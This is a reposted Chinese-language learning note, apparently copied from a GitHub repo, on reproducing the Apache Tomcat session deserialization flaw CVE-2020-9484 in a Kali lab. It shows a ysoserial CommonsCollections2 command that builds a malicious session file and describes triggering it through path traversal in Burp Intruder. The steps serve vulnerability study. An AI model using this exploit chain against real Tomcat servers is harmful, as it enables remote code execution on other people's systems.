碼上歡樂
相關內容    簡體    繁體

Apache #Tomcat CVE-2020-9484

本文轉載自   查看原文   2020-06-22 08:29   1056    學習筆記

CVE-2020-9484

用Kali 2.0復現Apache Tomcat Session反序列化代碼執行漏洞 CVE-2020-9484

環境:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar)

啟動

/yourtomcatdir/bin/startup.sh 

 

 

生成payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

利用

先訪問S2-053看是否啟動正常: http://192.168.152.128:8080/s2-053/ 

 

 


重新訪問抓包,用intruder進行路徑遍歷 

 

 


 

 

 

執行命令成功: 

https://github.com/IdealDreamLast/CVE-2020-9484/raw/master/img/ok.png

本文轉自https://github.com/IdealDreamLast/CVE-2020-9484/


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CVE-2020-9484 Apache Tomcat反序列化漏洞淺析 CVE-2020-9484 tomcat session反序列化漏洞分析與復現 [Vulfocus解題系列]Apache Tomcat 反序列化代碼執行漏洞復現(CVE-2020-9484)_一次失敗的漏洞復現 Apache Tomcat Ajp CVE-2020-1938漏洞復現 CVE-2020-1938 Apache-Tomcat-Ajp漏洞復現 CVE-2020-1938 Apache Tomcat AJP文件包含漏洞 Apache Tomcat 文件包含漏洞 (CVE-2020-1938) 復現 Apache Tomcat 文件包含漏洞(CVE-2020-1938) CVE-2020-1938:Apache-Tomcat-Ajp漏洞-復現 CVE-2020-1938 Apache-Tomcat-Ajp漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM